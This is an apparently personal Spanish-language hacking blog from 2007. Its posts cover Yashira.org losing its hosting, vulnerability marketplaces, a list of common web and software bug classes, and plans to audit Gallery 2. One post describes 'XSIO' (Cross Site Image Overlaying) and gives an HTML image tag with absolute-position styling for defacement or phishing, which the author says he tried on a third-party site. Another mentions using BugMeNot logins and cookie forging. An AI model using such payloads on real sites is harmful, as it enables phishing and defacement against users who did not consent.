(ebooks, etc).

The account will not be re-enabled under any circumstances.

Jeff,

------------------------------------

aún seguimos esperando una respuesta para recuperar al menos la base de datos.
pero ya se perdieron esperanzas.

¿creen que es justo pagar por todo 1 año sin derecho a reemboloso de los meses no utlizados y además sin derecho a tus backups?
yo pienso que no!!!, me parece que es una estafa.

alguien se ha preguntado como llenar un disco de 250 gigas con material 100% legal, es decir sin mp3,videos,juegos,ezines, etc....

es por el mismo motivo que ofrecen esa cantidad de espacio ya que es casi imposible llenarlo.
y encaso de que alguien comiencé o ocupar espacio fuera de lo normal, no tardarán en encontrar una escusa para clausurar tu cuenta. ya que no estaba presupuestado que ocuparas mas de 10 gigas ya que nadie ocupa esa cantidad sin que sea 100% legal.

ya saben ;) pasen el dato que dreamhost vale vergas.

lo concreto es:
-el backup mas reciente es del día en que aparecen los puntajes del podium , es decir: 27 de septiembre 2007
- no tenemos host.
- y al menos yo como admin no gastaré 1 peso en un host que seguramente a los 3 meses lo vuelvan a cerrar por el mismo motivo.

Entonces regresará yashira?
- depende de los usuarios. si en realidad les interese que vuelva comuniquense con garcez,Alexhk_23 o g30rg3_x sobre ofertas de host y/o colaboraciones desinteresada de dinero.
les recordamos que yashira consume mas de lo normal en recursos y que necesita de al menos unas 40gigas de transferencia mensual y al menos 2 giga de espacio.

Cual es el pronóstico?
- lo mas probable es que yashira no vuelva a estar online, y no es debido a que los admin sean kagones con el dinero, si no mas bien que en todos los lugares donde se aloje, estará fuera de lo legal y/o terminos del host ya sea host o servidor dedicado "ya que al final de cuentas igual está regido por las mismas reglas".

y si vuelve reestructurada?

opciones:
- una posibilidad sería que no existan descargas de ninguna clase de tools, y ser mas exigentes en el material a alojar en el sitio.
- dejar el sitio solamente como wargame+foro activos.
- cerrar yashira y dedicarlo solo a wargame.
- cerrar y dejar los retos hasta donde estaban sin pocion de agregar contendio ni retos.

que puedo hacer para colaborar y que vuelva?
comunicarse con garcez,Alexhk_23 o g30rg3_x sobre ofertas y colaboraciones monetarias.
por cierto lean http://www.dreamhost.com/tos.html que aparece cuando contratan el servico:
pero milagrosamente tienen oculto al momento de contratar.
http://abuse.dreamhost.com/ el cual aparece milagrosamente.
en otras palabras te dicen que pueden cerrar los sitios cuando se les antoje ya que todos están fuera de lo legal.

Saludos

------------------------------------------------------------------------

Pues leo esto y pienso que al menos con lo que costo el server, podrian devolver algo o en vez de cerrar hablar con el admin y que le de unos dias para que lo cambie o se le cierra, pero no ganar dinero y ala a olvidarse de la gente, asi se forran todos y asi va el mundo, con gente asi es de esperar que no muy bien, pero bueno se esta haciendo lo posible para que vuelva y todos tengan un lugar donde reunirse y hablar, si no esperen con el host que vengo que es bueno barato y tal vez haciendole unas pocas modificacioens se pueda.

Os veo Yashirosss y pez trankilo que esta vez lo pagan los yashiros y si se puede con el que digo lo pago yo mismo!!! Ya lo sabes!!

sábado, 6 de octubre de 2007

Vendiendo Vulnerabilidades

Hace relativamente poco tiempo parecia que iba a causar furor una web de este tipo y que se iba a acabar el ser buena persona y reportarlos gratuitamente como se ha hecho la mayoria de veces, pero una web Wabisabilabi en la que ponian los fallos y el dinero que vale, lo mas gracioso que era de preveer es que la gente que estaba en contra de esto, han empezado a ver la web para que posteen uno y buscar el bug y publicarlo antes de que se venda, y a mi parecer hacen bien que lo hagan gratuitamente, es mas yo estare atento alguna que otra vez para ver si puedo hacer algo, porque asi no se trafica tanto con la informacion jeje, y bueno la verdad que lo venden muy caro para el sotfware que es, asi que vendan lo que puedan pero eso si en poco tiempo o ya no servira.


PD: Para los que publican los bugs gratuitamente una enhorabuena a todos, eso si no habria muchos si se programase mejor y se vigilase desde el principio eso :P

jueves, 4 de octubre de 2007

Evitar el papeleo de registrarse en una web

Cuando necesitas un usuario registrado para entrar en un server mediante la tecnica de falsear cookies o simplemente que quieres ahorrarte tiempo al ver los contenidos de una web y te manda registrarte pues lo mejor es ir a esta web Bugmenot e ingresar la web de la cual quieres la contraseña y te saldra la mayoria de las veces una valida. A mi la verdad me ha ahorrado bastante tiempo asi que espero que os sirve, no se si existiran mas paginas de este tipo, pero os sera de ayuda para los perezosos como yo

viernes, 28 de septiembre de 2007

¿Buscaban "Hacker" o persona con conocimientos minimos?

Bueno me meti en el blog de mousehack, un user de elhacker.net y aunque anda algo desactualizado el blog me fije en un escrito que habia hecho, donde decia que:

Buscan Hacker...

Una empresa inglesa busca un "hacker" para mejorar o rehacer páginas webs seguras. Los candidatos que se ajusten al perfil deberían encontrar facilmente la dirección a la que enviar su curriculum en la siguiente cadena de texto: 43616c6c204a756c69616e206f6e20303230203739323420363632206f7220656d61696c206a756c69616e406c6f6e7265732e636f6d Solo admiten curriculums en texto plano o pdf.


y me llamo la atencion y pense...a ver si va a ser un hash de esos raros tiger o algo asi que suelen ser largos... y bueno dije mejor pasar aunque ande aburrido, pero bueno por probar no me pasaba nada...y me fue a desencriptar como si eso fuera texto ascii cifrado en hexadecimal, aunque pensaba que no seria porque buscaban un "hacker" pero derrepente veo que me lo descifra y dice: Call Julian on 020 7924 662 or email julian@lonres.com
Entonces ahi pense, este no necesita un hacker...este no tiene ni idea, y lo tercero menuda tonteria mas grande, asi que na, no avise para ver si tenia el curro porque no merece la pena...
Asi que nada, gente asi falta mas jejeje se encontrara trabajo mas facilmente.

jueves, 27 de septiembre de 2007

Errores de programacion

El principal problema de los llamados Hackers...prefiero llamarles Defacers mejor que es a lo que se dedican o eso nos hacen creer, tratan de modificar muchas veces el contenido de webs, o tambien los Crackers como alguien que entra en un sistema para hacer cosas ilegales y que perjudican al usuario, aunque eso de crackers se utiliza mas para los que estudian Ing. Inversa por lo que deberian llamarlos mas Ingenieros Inversos o algo asi jeje.
Tanto es asi que en la sociedad a los "Hackers" en la sociedad se les mira mal o lo usan de mala manera cuando muchos de ellos son los que arreglan los fallos de programacion al avisar de ellos y ayudan a mejorar el sistema. Entre los fallos mas importantes estan:

A nivel web:
Los que suelen ser por problemas de codigo de programacion para diseño de paginas web y que permiten hacer a un atacante muchas otras cosas como phising, intrusion total al servidor, sacar datos, contraseñas debiles y estudios de algoritmos para saltarse protecciones. Los fallos mas comunes son:
-XSS(Cross Site Scripting)
-CSRF(Cross site request forgery)
-RFI Y LFI(Remote/Local File Inclusion)
-INYECCIÓN SQL/LDAP/X-PATH
-VER CODIGO FUENTE SIN OFUSCAR(Java,Flash, Javascript...)

A nivel de software:
Los problemáticos que permiten principalmente ejecutar codigo arbitrario en la maquina o ganar permisos de admin son:
-BUFFER OVERFLOWS(Stack, Heap, Format String...)
-DOS/DDOS(Ataque de Denegación de Servicio, Distribuido)
-CODIGOS QUE PERMITEN BYPASSEAR PROTECCIONES(En php por ejemplo)
-OTRAS TECNICAS

Conociendo estas tecnicas muy bien y teniendo buena informacion es posible ya encontrar tus propios bugs y asi tener cuidado programando, es algo en lo que fallan las empresas, que se olvidan de la seguridad y luego llegan las consecuencias...por lo tanto deberian ponerse a enseñar como minimo estos fallos, dependiendo de lo que esten haciendo yentre todos ayudar a que haya mas info en español, asi que dentro de nada os escribo un articulo de una de nivel web que este lo mas completa y viendo todo tecnicamente y practicamente, ya que lo que busque en español siempre se repite, y lo del ingles habia buena info pero dispersada.

jueves, 20 de septiembre de 2007

Buscando Bugs en Gallery 2(en espera)

Bueno pues me puse a la busca de bugs de una version de Gallery 2, exactamente la 2.2.3 y en la que me baje completamente con todos los addons, una version de casi 20MB, la idea es que alguien como yo con conocimientos justos en php y de los errores mas comunes que hay si puede ser demuestre que no es muy dificil buscar bugs en software y que deberian testearse cualquier software en profundidad antes de ser lanzado, espero confundirme y no encontrar nada jejeje(broma me haria ilusion encontrar alugno xD), y bueno en caso de encontrar algun fallo lo muestro aqui, despues de haber avisado a los encargados del proyecto que al ser open source no tardaran en arreglarlo seguro porque suelen funcionar rapidamente.

Pagina web del proyecto: http://gallery.menalto.com/

------------------------------------------------
En espera por problemas de hosting

miércoles, 19 de septiembre de 2007

Editando Ezine para Yashira.org

Bueno en estos momentos me encuentro editanto una revista electronica para la web Yashira.org y que esta en plena fase de desarrollo, asi que quien quiera puede escribir un articulo para ella, eso si se piden sobretodo que sean novedosos o de los que se haya hablado poco, y que tengan buen nivel ya que espero que no sea una mas de las muchas que hay, y bueno cualquier pregunta ya sabeis.

Espero que salga pronto y os gusten los articulos, ale sigo editando y maquetando.

domingo, 16 de septiembre de 2007

Ataque XSIO

Hay una "nueva" o conocida, pero en la que no se ha hablado antes, vulnerabilidad llamada "XSIO" o lo que es lo mismo Cross Site Image Overlaying que se produce a causa del atributo style, nos permite un nuevo modo de hacer defaces..que se van a reir de ti como los hagas con estas cosas... o phising mediante links en imagenes, hay algunos sitios en los que para ir a algun lado hay que apretar en la imagen...¿que pasaria si en vez de la imagen esa vieramos una nuestra con nuestra sitio para hacer phising?Pues sencillo se podrian sacar datos como hacen actualmente y hacer que el usuario vea lo mismo cuando no lo es.

Le veo el problema a la vulnerabilidad de que en muchos sitios no va a funcionar ya que necesita para funcionar o HTML habilitado en algun lugar...pocos lo hacen, o mediante CSS que o eres admin, o en algunos blog esta esa posibilidad pero seguramente no funcione en muchos sitios aun asi en este funciona jejej, la cosa es que si pones para que vaya a una web...tendria que tener un sitio donde redireccione paginas web, ya que sino quedaria algo asi: http://trancek.blogspot.com/http://yashira.org y daria un error .
Lo probe en algunos sitios y algunos ya traen proteccion por si intentas hacer algo asi aun si puede ver e intentar hacer cosas malignas, es solo tener imaginacion.

Ejemplo:


Al hacer un post por ejemplo con el codigo:

{img src=http://img514.imageshack.us/img514/163/dibujobi1.jpg style=position:absolute;right:350px;top:90px;/}

{} es lo mismo que <> es que esto tmb es vulnerable...jejeje

Solo lo probe ahi, una web que me encontre por ahi, y nada mas probarlo lo borre soy buena gente.
Asi que los que lean esto lo prueben con sus webs por si acaso y no hagais muchas maldades, con conocimientos del html se te ocurriran mas cosas que hacer.

Articulo: XSIO

Uno mas que se une a los blog

Aqui va mi diario ejejeje, para que vean que siempre esta bien decir unas cuantas paridas al dia y poco mas.

2001
Creo que por esa epoca empece a ver eso de internet.
2002
Me empiezo a interesar por la Ing Inversa pero como soy un niño no me entero de nada y lo dejo.
2003-2004
Soy un chico interesado en los llamados wargames y en el hacking, todavia me quedaba mu lejos todo, me leo de todo y sobretodo ezines como Disidents.
2005-2006
Me vicio a una web llamada hackyashira.com actualmente llamada yashira.org
2007
Aqui me llego una epoca en la que aprendo mas cosas y voy viendo como manejarme en esto.
2008
Soy millonario e invito a todo el mundo a cocteles, me hice rico ayudando gratis, por lo tanto los cocteles con bebidas de marcas baratas, sorry
2012
Se acabo el mundo, estoy escribiendo desde dios sabe donde.
2013-20xx
Me internan en el psiquiatrico y lo demas ya lo sabeis.


Quien haya leido esto no tiene derecho a dcir que estoy loco, mas que nada porque el loco seria el que lo lee no el que lo escribe, ya que a partir de cierto lugar deberia de haber dejado de leer xD

Saludos